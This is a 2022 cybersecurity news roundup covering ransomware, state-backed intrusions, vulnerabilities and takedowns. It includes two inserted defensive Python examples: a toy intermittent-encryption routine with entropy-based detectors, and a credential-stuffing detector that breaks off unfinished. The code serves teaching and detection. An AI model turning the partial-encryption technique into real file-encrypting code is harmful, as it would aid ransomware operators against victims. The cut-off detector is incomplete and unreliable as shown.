    On the morning of September 11, 2022, the U.S. Army launched a swarm of 40 small quadcopter drones into the California desert as part of a training exercise designed to prepare America’s soldiers for a grim reality of modern war: cheap off-the-shelf drones capable of carrying munitions have become ubiquitous on the battlefield. As first spotted by The War Zone, the drone swarm is part of a training exercise. “MILES, and lethal munition capable” sounds ominous but refers to what the drone is capable of doing and the equipment it carries. MILES is the Multiple Integrated Laser Engagement System, a kind of fancy laser tag that tracks kills and casualties.

    Iranian Attackers Upgrade Social Engineering Tactics

    Iranian threat actor TA453 has been sending spear-phishing emails to individuals specializing in Middle Eastern affairs, nuclear security and genome research with a social engineering twist: As opposed to a one-on-one conversation, the known actor has been including multiple fake personas on the email chain in hopes of making the attack appear more legitimate. Researchers said that the technique, which has been previously used by business email compromise (BEC) group Cosmic Lynx, is “intriguing” because attackers must leverage more resources and email addresses.

    New PsExec Spinoff Lets Hackers Bypass Network Security Defenses

    Security researchers have developed an implementation of the Sysinternals PsExec utility that allows moving laterally in a network using a single, less monitored port, Windows TCP port 135. PsExec is a legitimate tool that helps administrators execute processes remotely on machines in the network without having to install a client. Threat actors have abused the tool for post-exploitation stages of an attack, using it to spread on the network, run commands on multiple systems, and deploy malware.

    Cisco Confirms Yanluowang Ransomware Leaked Stolen Company Data

    Cisco has confirmed that the data leaked yesterday by the Yanluowang ransomware gang was stolen from the company network during a cyberattack in May. However, the company says in an update that the leak does not change the initial assessment that the incident has no impact on the business: “On September 11, 2022, the bad actors who previously published a list of file names from this security incident to the dark web, posted the actual contents of the same files to the same location on the dark web. The content of these files match what we already identified and disclosed. Our previous analysis of this incident remains unchanged; we continue to see no impact to our business, including Cisco products or services, sensitive customer data or sensitive employee information, intellectual property, or supply chain operations.”

    Cops Raid Suspected Fraudster Penthouses

    Investigators have disrupted a major organized crime gang believed to have tricked thousands of British victims into handing over money. The UK’s National Crime Agency (NCA) and Romanian police searched two penthouse apartments in Bucharest thought to have been the nerve center for a fraud operation that targeted consumers across Europe on a “massive scale.”

    Ransomware Actors Embrace Intermittent Encryption

    Threat actors are increasingly turning to a new encryption method in their ransomware attacks, designed to improve success rates, according to SentinelOne. SentinelLabs researchers Aleksandar Milenkoski and Jim Walter wrote in a new blog post that “intermittent encryption” is being heavily advertised to buyers and affiliates. Compared with traditional ransomware methods, this approach offers higher speed and a better ability to evade detection tools. By encrypting only parts of each file (for example, alternating encrypted and untouched blocks), the ransomware renders files unusable far faster than it could by encrypting every byte, and the resulting file also defeats the statistical analysis that security tools commonly use to spot ransomware: a partially encrypted file still looks, on average, like a normal file rather than like random data.
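    To make the evasion concrete, the following Python is an added example (not SentinelLabs' code nor any ransomware family's): it "encrypts" a constructed document in full and intermittently, measures the whole-file Shannon entropy that a naive detector would use, and shows a per-block variant of the check that still catches the partially encrypted file. The keystream is a SHA-256 counter construction with a fixed key used only to produce random-looking bytes; the block size, the one-in-four ratio and the 7.0 bits/byte threshold are assumptions for the illustration.

```python
"""Added example: why partial ("intermittent") encryption slips past whole-file
entropy heuristics, and a per-block check that catches it.
Not SentinelLabs' or any ransomware family's code. The keystream is a SHA-256
counter construction with a fixed key (toy, not real encryption); CHUNK, EVERY
and THRESHOLD are assumptions."""
import hashlib
import math
from collections import Counter

CHUNK = 4096          # block granularity used by the toy encryptor and the detector
EVERY = 4             # intermittent mode encrypts one block in EVERY
KEY = b"\x01" * 32    # fixed toy key so the example is reproducible
THRESHOLD = 7.0       # bits/byte at or above which a buffer "looks encrypted"

# Constructed ~100 KB document-like plaintext.
PLAINTEXT = b"Quarterly report: revenue grew 4% on stable costs. " * 2000


def keystream(key, nonce, nbytes):
    """SHA-256(key || nonce || counter) blocks, truncated to nbytes."""
    out = bytearray()
    ctr = 0
    while len(out) < nbytes:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return bytes(out[:nbytes])


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_full(data, key=KEY):
    """Conventional ransomware behaviour: every byte is transformed."""
    return xor_bytes(data, keystream(key, b"full", len(data)))


def encrypt_intermittent(data, key=KEY, every=EVERY):
    """Encrypt only every `every`-th CHUNK; leave the other blocks as plaintext.
    Symmetric: applying it again to the output restores the input."""
    out = bytearray()
    for i in range(0, len(data), CHUNK):
        block = data[i:i + CHUNK]
        if (i // CHUNK) % every == 0:
            block = xor_bytes(block, keystream(key, i.to_bytes(8, "big"), len(block)))
        out += block
    return bytes(out)


def shannon_entropy(data):
    """Bits per byte; 8.0 is the maximum, typical text sits around 4-5."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data, threshold=THRESHOLD):
    """Whole-file heuristic of the kind intermittent encryption is designed to defeat."""
    return shannon_entropy(data) >= threshold


def looks_encrypted_chunked(data, threshold=THRESHOLD):
    """Per-block heuristic: flag if ANY CHUNK-sized block is high entropy.
    Catches intermittent encryption, at the cost of false positives on files
    that legitimately embed compressed or encrypted regions."""
    return any(shannon_entropy(data[i:i + CHUNK]) >= threshold
               for i in range(0, len(data), CHUNK))


def compare(data=PLAINTEXT):
    """(entropy, whole-file verdict, per-block verdict) for plain, full and intermittent copies."""
    full = encrypt_full(data)
    part = encrypt_intermittent(data)
    return {
        "plain": (round(shannon_entropy(data), 2), looks_encrypted(data), looks_encrypted_chunked(data)),
        "full": (round(shannon_entropy(full), 2), looks_encrypted(full), looks_encrypted_chunked(full)),
        "intermittent": (round(shannon_entropy(part), 2), looks_encrypted(part), looks_encrypted_chunked(part)),
    }


if __name__ == "__main__":
    for name, (h, whole, per_block) in compare().items():
        print(f"{name:13s} entropy={h:5.2f} whole-file={whole!s:5s} per-block={per_block}")
```

    Running it shows the plaintext and the intermittently encrypted copy both under the whole-file threshold while the fully encrypted copy sits near 8 bits/byte, which is exactly the blind spot the technique exploits; the per-block check flags the intermittent copy because at least one 4 KB block is indistinguishable from random data. The trade-off is false positives on files that legitimately contain compressed or encrypted regions, which is why production detection also looks at write patterns and file-rename behaviour rather than entropy alone.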

    U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania

    The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, “for engaging in cyber-enabled activities against the nation and its allies” (The Hacker News, 2022). According to the Treasury, the MOIS and its cyber actor proxies have engaged in malicious cyber operations targeting a range of government and private-sector organizations around the world and across various critical infrastructure sectors since at least 2017. More recently, in mid-July of this year, Iranian state-sponsored threat actors targeted Albanian government computer systems, forcing the government to temporarily suspend its online services. As a result, the Albanian government announced on September 7, 2022, that it would be severing diplomatic ties with Iran.

    China Accuses NSA's TAO Unit of Hacking its Military Research University

    China recently blamed the U.S. National Security Agency for cyberattacks in June 2022 aimed at Northwestern Polytechnical University, an aeronautical and military research university in the city of Xi'an. The National Computer Virus Emergency Response Centre (NCVERC) disclosed its findings last week and accused the NSA's Office of Tailored Access Operations (TAO) of orchestrating thousands of attacks against entities located within the country.

    Bumblebee Malware Adds Post-exploitation Tool for Stealthy Infections

    A new version of the Bumblebee malware loader has been spotted in the wild, featuring a new infection chain that uses the PowerSploit framework for stealthy reflective injection of a DLL payload into memory. Bumblebee was discovered in April, involved in phishing campaigns believed to be orchestrated by the same actors behind BazarLoader and TrickBot, i.e., the Conti syndicate. According to a report by Cyble, based on a finding by threat researcher Max Malyutin, the authors of Bumblebee are preparing a comeback from the summer hiatus of spam operations, using a new execution flow.

    GIFShell Attack Creates Reverse Shell Using Microsoft Teams GIFs

    Researchers discovered a new attack technique they are calling “GIFShell” which allows threat actors to abuse Microsoft Teams to execute commands and steal data using GIFs. Attackers are able to string together various Microsoft Teams vulnerabilities and flaws to deliver malicious files, commands, and perform data exfiltration using GIFs. The exfiltration is done through Microsoft’s own servers, which will make the malicious traffic harder to detect by security software.

    CISA Orders Agencies to Patch Chrome, D-Link Flaws Used in Attacks

    CISA has added 12 more security flaws to its list of bugs exploited in attacks, including two critical D-Link vulnerabilities and two (now-patched) zero-days in Google Chrome and the Photo Station QNAP software. The Google Chrome zero-day (CVE-2022-3075) was patched on September 2nd via an emergency security update after the company was made aware of in-the-wild exploitation.

    Zimbra Email Vulnerability Weaponized To Cause Large-Scale Compromise

    In August 2022, Cyble Research & Intelligence Labs (CRIL) discovered and reported an alarming trend of exploitation of the Zimbra Collaborative Suite (ZCS) by cybercriminals. During their routine monitoring of threat activities in various cybercrime forums to gauge the impact of cyberattacks, they discovered an instance wherein the web shell accesses to multiple email servers operating on Zimbra Collaboration Suite (ZCS) were auctioned in a Russian cybercrime forum. The impacted email servers were allegedly vulnerable to the authentication bypass remote code execution (RCE) vulnerability.

    Lazarus Group Unleashed a MagicRAT to Spy on Energy Providers

    The North Korean state-sponsored crime ring Lazarus Group is behind a new cyberespionage campaign with the goal to steal data and trade secrets from energy providers across the US, Canada and Japan. The Lazarus Group is perhaps best known for the infamous WannaCry attacks and a ton of cryptocurrency theft. Now it's going after the troubled energy markets run by its foes. In research published today, Cisco Talos threat researchers say they observed malicious activity attributed to Lazarus Group between February and July. The reconnaissance and spy campaigns targeted "multiple victims."

    Microsoft Warns of Ransomware Attacks by Iranian Phosphorus Hacker Group

    Microsoft's threat intelligence division on Wednesday assessed that a subgroup of the Iranian threat actor tracked as Phosphorus is conducting ransomware attacks as a "form of moonlighting" for personal gain. The tech giant, which is monitoring the activity cluster under the moniker DEV-0270 (aka Nemesis Kitten), said it's operated by a company that functions under the public aliases Secnerd and Lifeweb, citing infrastructure overlaps between the group and the two organizations.

    Cisco Won’t Fix Authentication Bypass Zero-Day in EoL Routers

    Cisco says that a new authentication bypass flaw affecting multiple small business VPN routers will not be patched because the devices have reached end-of-life (EoL). This zero-day bug (CVE-2022-20923) is caused by a faulty password validation algorithm that attackers could exploit to log into the VPN on vulnerable devices using what the company describes as "crafted credentials" if the IPSec VPN Server feature is enabled.

    LAUSD, One of the Largest School Districts in the U.S., Suffers Ransomware Attack

    Los Angeles Unified School District (LAUSD), the largest public school system in California and the 2nd largest public school district in the United States, revealed that last weekend it had been the victim of a ransomware incident that impacted its Information Technology (IT) systems. The LAUSD had 664,774 students enrolled for the 2020–2021 school year, including 50,805 adult students and 124,400 students attending independent charter schools. During the same academic year, it had 25,088 teachers and 50,586 other employees.

    Google: Former Conti Cybercrime Gang Members Now Targeting Ukraine

    Google says some former Conti ransomware gang members, now part of a threat group tracked as UAC-0098, are targeting Ukrainian organizations and European non-governmental organizations (NGOs). UAC-0098 is an initial access broker known for using the IcedID banking trojan to provide ransomware groups with access to compromised systems within enterprise networks.

    RCE Vulnerability Affects Zyxel NAS Devices — Firmware Patch Released

    On Tuesday, networking equipment manufacturer Zyxel rolled out firmware patches to address a critical security flaw impacting its network-attached storage devices. Tracked as CVE-2022-34747 (CVSS score: 9.8), the flaw is related to a format string vulnerability. According to Zyxel, CVE-2022-34747 was found in a specific binary of Zyxel NAS products and could enable an attacker to achieve unauthorized remote code execution via a specially crafted UDP packet.

    Security researcher Shaposhnikov Ilya has been credited with discovering the vulnerability.
    Below is a list of the impacted Zyxel NAS devices:

    • NAS326 (V5.21(AAZF.11)C0 and earlier)
    • NAS540 (V5.21(AATB.8)C0 and earlier)
    • NAS542 (V5.21(ABAG.8)C0 and earlier)

    As of writing, Zyxel hasn’t disclosed whether CVE-2022-34747 is being exploited in attacks in the wild.

    Authorities Shut Down WT1SHOP Site for Selling Stolen Credentials and Credit Card

    An international law enforcement operation has resulted in the dismantling of WT1SHOP, an online criminal marketplace that specialized in the sale of stolen login credentials and other personal information. The seizure was orchestrated by Portuguese authorities, with U.S. officials taking control of four domains used by the website: ‘wt1shop[.]net,’ ‘wt1store[.]cc,’ ‘wt1store[.]com,’ and ‘wt1store[.]net.’

    Moobot Botnet is Back and Targets Vulnerable D-Link Routers

    Palo Alto Networks' Unit 42 researchers reported a new wave of attacks launched by the Moobot botnet targeting vulnerable D-Link routers. The wave started in August and exploits both old and new vulnerabilities (T1190). “The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021; in November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the webserver of several Hikvision products.”

    New Worok Cyber-Espionage Group Targets Governments, High-Profile Firms

    A newly discovered cyber-espionage group has been hacking governments and high-profile companies in Asia since at least 2020 using a combination of custom and existing malicious tools. The threat group, tracked as Worok by ESET security researchers who first spotted it, has also attacked targets from Africa and the Middle East. To date, Worok has been linked to attacks against telecommunications, banking, maritime, and energy companies, as well as military, government, and public sector entities.

    Google Chrome Emergency Update Fixes New Zero-Day Used in Attacks

    On Friday, Google rolled out fixes to address a high-severity zero-day bug in the Chrome web browser. Tracked as CVE-2022-3075, the vulnerability is caused due to insufficient data validation in Mojo, a collection of runtime libraries that facilitates message passing across arbitrary inter- and intra-process boundaries. The flaw was discovered by a security researcher who anonymously reported it to Google. Since then, the company has issued a fix, releasing Chrome 105.0.5195.102 for Windows, Mac, and Linux.

    SharkBot Malware Resurfaces on Google Play to Steal Users' Credentials

    Researchers from Fox-IT published a blog post on an upgraded version of the SharkBot mobile malware (T1587.001) that was found uploaded to the Google Play Store (T1608.001). The updated version targets the banking credentials of Android users through malicious applications. Fox-IT notes that across the malicious apps there have been roughly 60,000 installations. The apps have since been removed from the Google Play Store; the most notable were titled “Mister Phone Cleaner” and “Kylhavy Mobile Security.”

    Google Chrome Bug Lets Sites Silently Overwrite System Clipboard Content

    A "major" security issue in the Google Chrome web browser, as well as Chromium-based alternatives, could allow malicious web pages to automatically overwrite clipboard content without requiring any user consent or interaction by simply visiting them. The clipboard poisoning attack is said to have been accidentally introduced in Chrome version 104, according to developer Jeff Johnson.

    New ransomware hits Windows, Linux servers of Chile govt agency

    Chile's national computer security and incident response team (CSIRT) has announced that a ransomware attack has impacted operations and online services of a government agency in the country. The attack started on Thursday, August 25, targeting Microsoft and VMware ESXi servers operated by the agency. The hackers stopped all running virtual machines and encrypted their files, appending the ".crypt" filename extension.

    New Evidence Links Raspberry Robin Malware to Dridex and Russian Evil Corp Hackers

    Researchers at IBM recently uncovered similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operator’s connection to the Russia-based Evil Corp group. First discovered in September 2021, Raspberry Robin is a worm that spreads via external drives. Since its discovery, the worm has remained in the shadows for nearly a year. However, in July 2022, Microsoft observed FakeUpdates (aka SocGholish) malware being delivered via existing Raspberry Robin infections, with potential connections identified between DEV-0206 and DEV-0243.

    San Francisco 49ers: Blackbyte Ransomware Gang Stole Info of 20K People

    NFL's San Francisco 49ers are mailing notification letters confirming a data breach affecting more than 20,000 individuals following a ransomware attack that hit its network earlier this year. The San Francisco Bay Area professional American football team confirmed that personal information (including names and Social Security numbers) belonging to 20,930 impacted individuals was accessed and/or stolen in the attack between February 6 and February 11, 2022.

    Researchers Analyzed a New JavaScript Skimmer Used by Magecart Threat Actors

    Cyble Research & Intelligence Labs started its investigation after seeing a post on Twitter about a new JavaScript skimmer developed by the Magecart threat group and used to target Magento e-commerce websites. In Magecart attacks against Magento e-stores, attackers attempt to exploit vulnerabilities in the popular CMS (T1190) to gain access to the source code of the website and inject malicious JavaScript (T1059.007). The malicious code is designed to capture payment data (credit/debit card owner’s name, credit/debit card number, CVV number, and expiry date) from payment forms and checkout pages. The malicious code also performs some checks to confirm that the data is in the correct format, for example by analyzing the length of the entered data.

    NSA and CISA Share Tips to Secure the Software Supply Chain

    The U.S. National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) have released tips today on securing the software supply chain. This guidance is designed by the Enduring Security Framework (ESF)—a public-private partnership that works to address threats to U.S. critical infrastructure and national security systems—to serve as a collection of suggested practices for software developers.

    Apple Releases Update for iOS 12 to Patch Exploited Vulnerability

    Apple has released an iOS 12 update for older iPhone and iPad devices, patching a vulnerability that was reportedly exploited by threat actors. According to a document published by the company on Wednesday, August 31, the flaw would allow the processing of maliciously crafted web content, which in turn led to arbitrary code execution.

    Over 1,000 iOS Apps Found Exposing Hardcoded AWS Credentials

    Security researchers are raising the alarm about mobile app developers relying on insecure practices that expose Amazon Web Services (AWS) credentials, making the supply chain vulnerable. Malicious actors could take advantage of this to access private databases, leading to data breaches and the exposure of customers' personal data.

    UK Imposes Tough New Cybersecurity Rules for Telecom Providers

    A new security framework for the UK’s telecommunications industry is set to come into effect in October, making the UK’s telecoms security regulations among the strongest in the world. A response to a public consultation was published by the UK government on August 30, 2022, and set out the changes made to the draft regulations and code of practice ahead of the planned commencement of the new framework in October 2022.

    Researchers Detail Emerging Cross-Platform BianLian Ransomware Attacks

    The operators of the emerging cross-platform BianLian ransomware have increased their command-and-control (C2) infrastructure this month, a development that alludes to an increase in the group's operational tempo. The earliest known C2 server associated with BianLian is said to have appeared online in December 2021. But the infrastructure has since witnessed a "troubling explosion" to surpass 30 active IP addresses.

    Ukraine Takes Down Cybercrime Group Hitting Crypto Fraud Victims

    The National Police of Ukraine (NPU) took down a network of call centers used by a cybercrime group focused on financial scams and targeting victims of cryptocurrency scams under the guise of helping them recover their stolen funds. The fraudsters behind these illegal call centers were also allegedly involved in scamming citizens of Ukraine and European Union countries interested in cryptocurrency, securities, gold, and oil investments. Throughout this cross-border fraud operation, they used software and high-tech equipment that made it possible to spoof the phone numbers of state banking organizations.

    Chinese Hackers Target Australian Govt With ScanBox Malware

    China-based threat actors have been targeting Australian government agencies and wind turbine fleets in the South China Sea by directing select individuals to a fake website impersonating an Australian news media outlet. Victims landed on the fraudulent site after receiving phishing emails with enticing lures and received a malicious JavaScript payload from the ScanBox reconnaissance framework.

    Hackers Hide Malware in James Webb Telescope Images

    Threat analysts have spotted a new malware campaign dubbed ‘GO#WEBBFUSCATOR’ that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware. The malware is written in Golang, a programming language that is gaining popularity among cybercriminals because it is cross-platform (Windows, Linux, Mac) and offers increased resistance to reverse engineering and analysis.

    Cuba Ransomware Gang Takes Credit for Attacking Montenegro

    The Cuba ransomware gang is taking credit for attacking the government of Montenegro, which took offline multiple government websites and services amid what officials characterize as a targeted cyberattack. Government officials in the Western Balkan nation (which has a population of 620,000) on Friday acknowledged disruptions to online government infrastructure.

    Chrome Extensions with 1.4 Million Installs Steal Browsing Data

    Threat analysts at McAfee found five Google Chrome extensions that track users’ browsing activity. Collectively, the extensions have been downloaded more than 1.4 million times. “The purpose of the malicious extensions is to monitor when users visit e-commerce websites and to modify the visitor's cookie to appear as if they came through a referrer link. For this, the authors of the extensions get an affiliate fee for any purchases at electronic shops.”

    Nelnet Servicing Breach Exposes Data of 2.5M Student Loan Accounts

    Data for over 2.5 million individuals with student loans from Oklahoma Student Loan Authority (OSLA) and EdFinancial was exposed after hackers breached the systems of technology services provider Nelnet Servicing. Technology services from Nelnet Servicing, including a web portal, are used by OSLA and EdFinancial to give students taking out a loan online access to their loan accounts.

    New Golang-based 'Agenda Ransomware' Can Be Customized For Each Victim

    Security researchers at Trend Micro recently uncovered a new ransomware strain that is being used in attacks targeting healthcare and education entities in Indonesia, Saudi Arabia, South Africa, and Thailand. Dubbed “Agenda,” the ransomware is a 64-bit Windows PE file written in the Go programming language. According to Trend Micro, “Agenda can reboot systems in safe mode, attempts to stop many server-specific processes and services, and has multiple modes to run.”

    Google Launches Open-Source Software Bug Bounty Program

    Google will now pay security researchers to find and report bugs in the latest versions of Google-released open-source software (Google OSS). The company's newly announced Vulnerability Reward Program (VRP) focuses on Google software and repository settings (like GitHub actions, application configurations, and access control rules). It applies to software available on public repositories of Google-owned GitHub organizations as well as some repositories from other platforms.

    FBI: Hackers Increasingly Exploit DeFi Bugs to Steal Cryptocurrency

    The U.S. Federal Bureau of Investigation (FBI) is warning investors that cybercriminals are increasingly exploiting security vulnerabilities in Decentralized Finance (DeFi) platforms to steal cryptocurrency. "The FBI encourages investors who suspect cyber criminals have stolen their DeFi investments to contact the FBI via the Internet Crime Complaint Center or their local FBI field office."

    Critical Hole in Atlassian Bitbucket Allows Any Miscreant to Hijack Servers

    A critical command-injection vulnerability in multiple API endpoints of Atlassian Bitbucket Server and Data Center could allow an unauthorized attacker to remotely execute malware, and view, change, and even delete data stored in repositories. Atlassian has fixed the security holes, which are present in versions 7.0.0 to 8.3.0 of the software. There have been no reports of active exploitation in the wild. The vulnerability, which is tracked as CVE-2022-36804, received a CVSS score of 9.9, and users are urged to update servers as soon as possible.

    US Cyber Command and NSA Partner On Defense Efforts For Midterms

    US military and intelligence entities are renewing their efforts to protect electoral procedures from hacking and disinformation before and during the November midterm elections. The news comes from the US Cyber Command (USCYBERCOM) and the National Security Agency (NSA), who published a joint blog post detailing their security capabilities on Thursday.

    Nitrokod Crypto Miner Infected Over 111,000 Users with Copies of Popular Software

    A Turkish-speaking entity called Nitrokod has been attributed to an active cryptocurrency mining campaign that involves impersonating a desktop application for Google Translate to infect over 111,000 victims in 11 countries since 2019. The list of countries with victims includes the U.K., the U.S., Sri Lanka, Greece, Israel, Germany, Turkey, Cyprus, Australia, Mongolia, and Poland.

    Montenegro Says Russian Cyberattacks Threaten Key State Functions

    Members of the government in Montenegro are stating that the country is being hit with sophisticated and persistent cyberattacks that threaten the country’s essential infrastructure. Targets include electricity and water supply systems, transportation services, online portals that citizens use to access various state services, and more. Already, several power plants have switched to manual operations, while the state-managed IT infrastructure has been taken offline to contain the effect of the attacks.

    MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations

    In the last couple of weeks, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team have spotted Iran-based threat actors leveraging Log4j 2 vulnerabilities in SysAid applications to target organizations located in Israel. The actors belong to a group called MERCURY, which Microsoft assesses with high confidence to be affiliated with Iran’s Ministry of Intelligence and Security (MOIS).

    CISA: Vulnerability in Delta Electronics ICS Software Exploited in Attacks

    On Thursday, CISA added 10 security flaws to its catalog of actively exploited vulnerabilities, mandating federal agencies to take action by September 15. One of the flaws is a high-severity remote code execution vulnerability in Delta Electronics DOPSoft 2, an industrial automation software used for designing and programming human-machine interfaces (HMIs). Tracked as CVE-2021-38406, the flaw is related to an out-of-bounds write issue and is exploited by tricking the targeted user into opening a specially crafted project file. The vulnerability was discovered in September last year. However, at the time, CISA stated that the flaw would not be patched as the product had reached its end of life, with the vendor encouraging its customers to switch to a supported software release.

    Nato Investigates Hacker Sale of Missile Firm Data

    Nato is assessing the impact of a data breach of classified military documents being sold by a hacker group online. The data includes blueprints of weapons being used by Nato allies in the Ukraine conflict. Criminal hackers are selling the dossiers after stealing data linked to a major European weapons maker.

    LastPass Developer Systems Hacked to Steal Source Code

    LastPass, a popular password management firm suffered a data breach two weeks ago, enabling threat actors to exfiltrate the company’s source code and proprietary technical information. On Thursday, LastPass released a security advisory confirming the breach, stating that the hackers compromised a developer account to access the company’s developer environment. As of writing, LastPass has yet to disclose how the threat actors were able to compromise the developer account or what source code was stolen. However, the company confirmed that it has not found any evidence that customer data or encrypted password vaults were compromised.

    'Kimsuky' Hackers Ensure Their Malware Only Reaches Valid Targets

    The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers. According to a Kaspersky report published today, the threat group has been employing new techniques to filter out invalid download requests since the start of 2022, when the group launched a new campaign against various targets in the Korean peninsula.

    More Hackers Adopt Sliver Toolkit as a Cobalt Strike Alternative

    With Cobalt Strike growing in popularity as an attack tool for various threat actors, many defenders have learned to detect and stop attacks relying on this toolkit. As a result, hackers have moved to other frameworks like Sliver that aren’t so popular and can go unnoticed by Endpoint Detection and Response (EDR) and antivirus solutions.

    PyPI Packages Hijacked After Developers Fall for Phishing Emails

    Attacks against Python packages continue: yesterday researchers found a phishing campaign (T1566.002) targeting the PyPI registry. The Python packages “extol” and “spam” are among hundreds seen laced with malware after attackers compromised the accounts of maintainers who fell victim to a phishing email. “Admins of the PyPI registry confirmed yesterday a phishing email campaign had actively been targeting PyPI maintainers after Django project board member Adam Johnson reported receiving a suspicious email. The email urges developers, who have their packages published to PyPI, to undergo a mandatory "validation" process or risk getting their packages purged from the PyPI registry (T1204.001).”

    AiTM Phishing Campaign Also Targets G Suite Users

    The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services were spotted targeting Google G Suite users. The threat actors are using a proxy server between the victim and the website the user is trying to visit (T1557). The phishing site, which is controlled by the threat actors, allows them to monitor traffic and capture the victim's password and session cookie.

    Air-Gap Attack Exploits Gyroscope Ultrasonic Covert Channel to Leak Data

    A new data exfiltration technique has been discovered, which uses a covert ultrasonic channel to leak sensitive information from air-gapped computers to a nearby smartphone device. The adversarial model is called “Gairoscope” and was designed by Dr. Mordechai Guri, head of research and development (R&D) in the Cyber Security Research Center at the Ben Gurion University of the Negev in Israel.

    Pirated 3DMark benchmark tool delivering info-stealer malware

    Cybersecurity researchers have discovered multiple ongoing malware distribution campaigns that target internet users who seek to download copies of pirated software. The campaign uses SEO poisoning and malvertising to push malicious shareware sites high in Google Search results, promoting fake software along with cracks and product activation key generators.

    French Hospital Hit by $10M Ransomware Attack, Sends Patients Elsewhere

    The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the center of Paris, suffered a cyberattack on Sunday, which has resulted in the medical center referring patients to other establishments and postponing appointments for surgeries. CHSF serves an area of 600,000 inhabitants, so any disruption in its operations can endanger the health, and even lives, of people in a medical emergency.

    GitLab Patches Critical Remote Code Execution Vulnerability

    On Monday, DevOps platform GitLab rolled out patches for a remote code execution vulnerability impacting its GitLab Community Edition (CE) and Enterprise Edition (EE) releases. Tracked as CVE-2022-2884, the flaw received a CVSS score of 9.9/10, indicating a critical level of severity. According to GitLab, an authenticated user can achieve remote code execution via the GitHub import API.

    Below is a list of the impacted CE/EE versions:

    • All versions starting from 11.3.4 before 15.1.5
    • All versions starting from 15.2 before 15.2.3
    • All versions starting from 15.3 before 15.3.1

    CVE-2022-2884 has been addressed in GitLab Community Edition and Enterprise Edition versions 15.3.1, 15.2.3, and 15.1.5.

    Counterfeit Android Devices Revealed to Contain Backdoor Designed to Hack WhatsApp

    A team of mobile security researchers has discovered backdoors in the system partition of some budget Android device models that are counterfeit versions of known brand-name models (T1036). The malware, which the Doctor Web team first discovered in July 2022, was found in at least four different smartphones: ‘P48pro’, ‘radmi note 8’, ‘Note30u’ and ‘Mate40’. The threat actors used counterfeit devices that mimicked famous brand-name models. However, instead of having the latest OS version installed, they would come pre-installed with outdated versions.

    Over 80,000 Exploitable Hikvision Cameras Exposed Online

    Security researchers have discovered over 80,000 Hikvision cameras vulnerable to a critical command injection flaw that's easily exploitable via specially crafted messages sent to the vulnerable web server. The flaw is tracked as CVE-2021-36260 and was addressed by Hikvision via a firmware update in September 2021. However, according to a whitepaper published by CYFIRMA, tens of thousands of systems used by 2,300 organizations across 100 countries have still not applied the security update.

    CISA Warns of Active Exploitation of Palo Alto Networks' PAN-OS Vulnerability

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a security flaw impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The high-severity vulnerability, tracked as CVE-2022-0028 (CVSS score: 8.6), is a URL filtering policy misconfiguration that could allow an unauthenticated, remote attacker to carry out reflected and amplified TCP denial-of-service (DoS) attacks.

    FBI Warns of Residential Proxies Used in Credential Stuffing Attacks

    The Federal Bureau of Investigation (FBI) warns of a rising trend of cybercriminals using residential proxies to conduct large-scale credential stuffing attacks without being tracked, flagged, or blocked. Credential stuffing is a type of attack where threat actors use large collections of username/password combinations exposed in previous data breaches to try and gain access to other online platforms. Because people commonly use the same password at every site, cybercriminals have ample opportunity to take over accounts without cracking passwords or phishing any other information.
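    The FBI's point is that residential proxies spread a stuffing run across many ordinary-looking IPs, so a per-IP failure threshold sees almost nothing. The added example below (not from the FBI advisory or any vendor) runs a naive per-IP rule and account-centric signals over a constructed authentication log; the log format, field names and thresholds are assumptions.

```python
"""Credential-stuffing detection over a constructed auth log.

Added illustration, not code from the FBI advisory. Shows why a per-IP
failure threshold misses attempts routed through residential proxies
(each IP makes only a handful of attempts) and how account-centric and
fleet-wide signals still surface the campaign.
"""
from collections import defaultdict
import re

# Constructed sample log (timestamp user ip result); not real data.
# 198.51.100.x are normal users; 203.0.113.x plays the role of proxy exits,
# each trying a few accounts from a leaked list, one of which succeeds.
SAMPLE_LOG = """\
2022-08-19T10:00:01Z alice 198.51.100.5 OK
2022-08-19T10:00:05Z bob 198.51.100.9 FAIL
2022-08-19T10:00:09Z bob 198.51.100.9 OK
2022-08-19T10:01:00Z carol 203.0.113.10 FAIL
2022-08-19T10:01:01Z dave 203.0.113.10 FAIL
2022-08-19T10:01:02Z erin 203.0.113.10 FAIL
2022-08-19T10:01:03Z carol 203.0.113.11 FAIL
2022-08-19T10:01:04Z dave 203.0.113.11 FAIL
2022-08-19T10:01:05Z frank 203.0.113.11 FAIL
2022-08-19T10:01:06Z carol 203.0.113.12 FAIL
2022-08-19T10:01:07Z erin 203.0.113.12 FAIL
2022-08-19T10:01:08Z grace 203.0.113.12 FAIL
2022-08-19T10:01:09Z carol 203.0.113.13 OK
2022-08-19T10:01:10Z dave 203.0.113.13 FAIL
"""

# Assumed log line shape; adjust the pattern to the real auth log format.
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<ip>\S+)\s+(?P<result>OK|FAIL)$")


def parse_auth_log(text):
    """Return a list of event dicts in log order, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def per_ip_failure_threshold(events, threshold=5):
    """Naive control: IPs with at least `threshold` failed logins."""
    fails = defaultdict(int)
    for e in events:
        if e["result"] == "FAIL":
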